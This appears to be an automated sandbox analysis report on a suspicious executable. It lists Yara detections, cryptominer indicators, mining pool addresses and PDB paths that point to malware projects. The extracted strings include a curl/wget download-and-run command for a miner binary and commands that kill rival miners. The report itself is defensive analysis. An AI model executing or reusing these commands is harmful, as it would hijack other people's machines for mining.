Source: Yara match File source: 35.3.MpSigStub.exe.15b1ac33b5a.217.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aac654a.154.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2da78e.83.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2d858a.84.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a8daa72.66.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18283887577.0000015B1A84E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18336077687.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18339192227.0000015B1C094000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18285899877.0000015B1B2C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18304386604.0000015B1A404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18411185064.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18352105294.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18312369918.0000015B1C094000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299055991.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18324208366.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18311556427.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18307459590.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18337113449.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329511287.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18328153087.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18340382300.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332249196.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18343459823.0000015B1AC31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18306567757.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305228496.0000015B1B858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18316329497.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18301965811.0000015B1AEB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335934182.0000015B1B858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18331852304.0000015B1A84E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bf2fb91.211.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bf2fb91.132.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bf2fb91.170.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bf2fb91.55.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18347963996.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18296064516.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18325517837.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: ./meme-acryptonight-ostratum+tcp://xmr.crypto-pool.fr
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: window.exe-acryptonight-ostratum+tcp://monerohash.com:2222-u
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: ./meme-acryptonight-ostratum+tcp://xmr.crypto-pool.fr
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: ./meme-acryptonight-ostratum+tcp://xmr.crypto-pool.fr
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: TrojanDownloader:HTML/Xmrminer!mclg
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: /xmr-stak-cpu
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: /c taskkill /f /im NsCpuCNMiner* & tskill NsCpuCNMiner*
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: /c taskkill /f /im NsCpuCNMiner* & tskill NsCpuCNMiner*
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber||wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: XMRig miner

Compliance:

barindex
Uses 32bit PE files
Source: Foreign_Bank Account Details.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: he#@1.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp
Source: Binary string: bot.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.b*m.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb*.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: acpi.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: CryptoService.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp
Source: Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \mywscript.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
